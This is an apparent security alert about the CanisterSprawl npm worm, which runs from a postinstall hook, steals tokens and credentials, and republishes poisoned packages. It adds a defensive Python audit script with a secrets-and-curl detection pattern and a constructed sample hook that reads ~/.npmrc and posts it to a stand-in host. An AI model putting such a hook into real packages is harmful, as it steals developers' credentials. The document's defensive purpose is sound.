CanisterSprawl: self‑propagating supply‑chain worm infects npm and steals tokens

Colleagues, please note: cybersecurity researchers have identified a campaign dubbed CanisterSprawl, a self‑propagating worm that spreads via npm packages and exfiltrates developer tokens.
- Activates via a postinstall hook; steals .npmrc, SSH keys, cloud credentials, Docker and Kubernetes configs, .env files and browser/IDE extension data.
- Exfiltrated data is sent to an HTTPS webhook and an ICP canister; if publishing tokens are present, the attackers use them to publish poisoned package versions. There is PyPI‑targeting logic as well.
- JFrog and Wiz reported similar compromises and abuse of GitHub Actions via the pull_request_target trigger.
Why this matters: a single compromised environment can trigger chained infections and key leakage.
What measures are you strengthening to protect tokens and CI?
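One concrete check for the activation path described above, added here as an example and not part of the original post: a Python audit that lists every installed package declaring an install-time lifecycle script and flags hooks that reference credential files or call out to the network. The package names, script bodies and the example.invalid URL in the sample are constructed.

```python
import json
import os
import re

# Lifecycle scripts npm runs automatically during `npm install`; the post
# says the worm activates from postinstall.
INSTALL_HOOKS = ("preinstall", "install", "postinstall")

# Heuristic for hooks that touch developer secrets or call out to the network;
# built from the file types named in the post, not a signature of any real package.
SUSPICIOUS = re.compile(
    r"\.npmrc|\.ssh|\.env|\.docker|\.kube|credentials|curl\s|wget\s|https?://",
    re.IGNORECASE,
)


def audit_manifest(manifest: dict) -> list:
    """Return one finding per install-time hook declared in a package.json dict."""
    findings = []
    for hook in INSTALL_HOOKS:
        script = (manifest.get("scripts") or {}).get(hook)
        if script:
            findings.append({"package": manifest.get("name", "<unnamed>"), "hook": hook,
                             "script": script, "suspicious": bool(SUSPICIOUS.search(script))})
    return findings


def audit_node_modules(root: str) -> list:
    """Walk a node_modules tree and audit every package.json found in it."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        if "package.json" in files:
            with open(os.path.join(dirpath, "package.json"), encoding="utf-8") as fh:
                try:
                    findings.extend(audit_manifest(json.load(fh)))
                except json.JSONDecodeError:
                    pass  # malformed manifest: skip it rather than abort the audit
    return findings


# Constructed sample manifests (hypothetical package names): a legitimate
# native-build hook, a hook that reads ~/.npmrc and posts it out, and no hooks.
SAMPLE_MANIFESTS = [
    {"name": "native-addon", "scripts": {"install": "node-gyp rebuild"}},
    {"name": "evil-helper", "scripts": {"postinstall":
        "node -e \"fs.readFileSync(process.env.HOME+'/.npmrc')\" && curl -X POST https://example.invalid/hook"}},
    {"name": "plain-lib", "scripts": {"test": "jest"}},
]
```

Run `audit_node_modules("node_modules")` in CI to review every hook before it is allowed to execute; pairing this with `ignore-scripts=true` in the project .npmrc stops install hooks from running at all unless explicitly invoked.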
#cybersecurity #supplychain #npm #DevOps